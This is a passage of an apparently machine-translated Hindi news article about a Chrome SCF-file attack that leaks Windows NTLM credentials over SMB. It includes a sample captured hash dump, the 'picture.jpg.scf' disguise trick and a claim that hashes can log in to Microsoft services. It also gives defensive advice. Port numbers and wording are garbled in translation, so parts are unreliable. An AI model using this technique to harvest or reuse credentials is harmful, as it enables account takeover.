LMHASH: विकलांग
LM_CLIENT_CHALLENGE: विकलांग
NTHASH: 98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko :: मास्टर: 1122334455667788: 98daf39c3a253bbe4a289e7a746d4b24: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
इसमें कोई संदेह नहीं है, क्रेडेंशियल एन्क्रिप्ट किए गए हैं लेकिन बाद में मूल लॉगिन पासवर्ड को सादे पाठ में पुनर्प्राप्त करने के लिए "जबरदस्ती मजबूर" हो सकता है।
"यह उल्लेखनीय है कि एससीएफ फाइलें विंडोज एक्सप्लोरर में फ़ाइल और फ़ोल्डर सेटिंग्स की परवाह किए बिना विस्तारहीन दिखाई देगा," शोधकर्ता ने कहा। "इसलिए, फ़ाइल नामित picture.jpg.scf विंडोज एक्सप्लोरर में चित्र के रूप में दिखाई देगी। जेपीजी। यह एससीएफ फाइलों के उपयोग से हमलों की अपूर्व प्रकृति को जोड़ती है।"


पासवर्ड को डिक्रिप्ट करने की कोई आवश्यकता नहीं * कभी-कभी *


चूंकि कई माइक्रोसॉफ्ट सर्विसेज अपने हैशेड फॉर्म में पासवर्ड स्वीकार करती है, इसलिए हमलावर एन्क्रिप्टेड पासवर्ड का उपयोग अपने OneDrive, Outlook.com, Office 365, ऑफिस ऑनलाइन, स्काइप, Xbox लाइव और अन्य माइक्रोसॉफ्ट सेवाओं में लॉगिन करने के लिए कर सकते हैं, डिक्रिप्शन अनावश्यक।

शोधकर्ता के अनुसार, इस तरह की कमजोरियों, बड़े संगठनों के लिए गंभीर खतरा पैदा कर सकती हैं क्योंकि वे हमलावरों को अपने सदस्यों में से किसी एक का प्रतिरूपण करने के लिए सक्षम करते हैं, जिससे हमलावरों को तुरंत उपयोग करने के लिए विशेषाधिकारों का पुन: उपयोग करने की इजाजत दी जा सकती है और उनके आईटी संसाधनों का उपयोग और नियंत्रण प्राप्त कर सकते हैं अन्य सदस्यों पर हमले।

ऐसे एसएमबी प्रमाणीकरण संबंधी हमलों को कैसे रोकें?


बस, आउटबाउंड एसएमबी कनेक्शन (टीसीपी बंदरगाहों 13 9 और 445) को स्थानीय नेटवर्क से फायरवॉल के जरिए डब्लूएएन को ब्लॉक करें ताकि स्थानीय कंप्यूटर दूरस्थ एसएमबी सर्वरों को क्वेरी नहीं कर सकें।

Stankovic भी उपयोगकर्ताओं को सलाह देता है कि Google क्रोम में स्वचालित रूप से डाउनलोड अक्षम करने के लिए सेटिंग्स → उन्नत सेटिंग दिखाएं → और तब "पूछें कि कहां से प्रत्येक फ़ाइल को डाउनलोड करने से पहले सहेजना है" विकल्प को चेक करें।

यह परिवर्तन आपको प्रत्येक डाउनलोड प्रयास को मैन्युअल रूप से अनुमोदन देने की अनुमति देगा, जो एससीएफ फाइलों के उपयोग से क्रेडेंशियल चोरी के हमलों के जोखिम को काफी कम कर देगा।

Google भेद्यता के बारे में जानता है और एक पैच पर काम करने के लिए कहा जाता है, लेकिन उपयोगकर्ताओं के लिए पैच उपलब्ध होने पर कोई भी समय सीमा नहीं दी गई है।


Hindi Me latest Hack NeWs Ke Liye Humse Jude Rahiye .
Read More